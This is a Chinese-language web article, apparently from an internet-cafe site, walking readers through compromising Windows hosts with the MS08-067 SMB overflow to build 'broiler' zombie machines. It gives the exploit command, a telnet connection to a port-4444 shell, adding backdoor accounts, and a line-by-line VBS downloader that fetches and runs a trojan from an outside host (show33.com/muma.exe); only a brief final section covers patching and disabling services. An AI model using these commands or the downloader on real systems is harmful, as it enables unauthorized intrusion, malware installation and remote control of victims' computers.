天下网吧 >> 网吧天地 >> 网吧行业 >> 网络追踪 >> 正文

风靡全球的Ms08-067漏洞抓鸡大曝光

2008-12-29不详佚名

行溢出攻击的Ms08-067.exe 192.168.1.101命令,即可开始对其主机进行远程溢出。当溢出完毕后,返回的结果为SMB connect ok! Send payload over!则是溢出成功的信息提示,反之与其不一样的信息就是溢出失败的信息提示。当远程溢出成功后,我们继续在CMD命令行处,输入telnet IP地址 4444命令,与刚才溢出成功的主机4444端口进行连接,例如telnet 192.168.1.66 4444回车后,就可成功远程登录192.168.1.66主机,从而就可以在其远程主机任意添加自己的后门账号(如图4)。

  

     四、编写VBS脚本扩大战果

  尽管已经成功溢出,并且可以登录远程主机,但是命令行方式的操控,对于我们菜鸟来说,还是很不习惯的,所以得想方设法的将木马上传到远程主机并让其运行,方可直观操作。

  这里继续在远程主机输入命令,其建立脚本文件的命令如下:

  echo iLocal=Lcase(wscript.arguments(1))>wenpeng.vbe

  echo iremote=Lcase(wscript.arguments(0))>>wenpeng.vbe

  echo set xpost=createobject(“microsoft.xmlhttp”)>>wenpeng.vbe

  echo xpost.open “Get”,iremote,0>>wenpeng.vbe

  echo xpost.send() >>wenpeng.vbe

  echo set sget=Createobject(“adodb.stream”)>>wenpeng.vbe

  echo sget.mode=3>>wenpeng.vbe

  echo sget.type=1>>wenpeng.vbe

  echo sget.open()>>wenpeng.vbe

  echo sget.write(xpost.responsebody)>>wenpeng.vbe

  echo sget.savetofile ilocal,2>>wenpeng.vbe

  逐个执行完以上命令语句完毕后,此时就会在远程主机的当前目录下建立一个wenpeng.vbe的脚本文件。接下来将我们事先准备上传到空间的木马,下载到远程主机并执行即可,这里笔者木马存放的位置假设是http://www.show33.com:88/muma.exe,因此在远程主机里下载木马的命令,就应该是cscript wenpeng.vbe http:// www.show33.com:88/muma.exe wenpeng.exe。解释一下这句命令语句,cscript wenpeng.vbe代表执行wenpeng.vbe脚本,后面所跟的网址是想要下载的木马地址,wenpeng.exe则是木马下载后在本机的名称。执行脚本语句完毕后,输入wenpeng.exe回车后,即可使其木马文件在远程主机运行,此时你在利用本机的木马客户端程序与其服务端建立连接,就可非常直观的遥控这台肉鸡了。

  五、防范Ms08-067远程溢出攻击

  由于这个漏洞是致命的,所以一旦被入侵后果将不堪设想,因此我们可以微软的官方站点,下载编号为KB958644的补丁,对其漏洞进行修补。再则通过关闭Computer browser、server、workstation这三个服务关闭,也可防止黑客远程溢出攻击,当然安装防火墙安全级别设置为高级,也是一种防止黑客入侵的不错选择。

9 7 3 1 2 4 8 :

本文来源:不详 作者:佚名

声明
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。文章是出于传递更多信息之目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。 Email:support@txwb.com,系统开号,技术支持,服务联系微信:_WX_1_本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行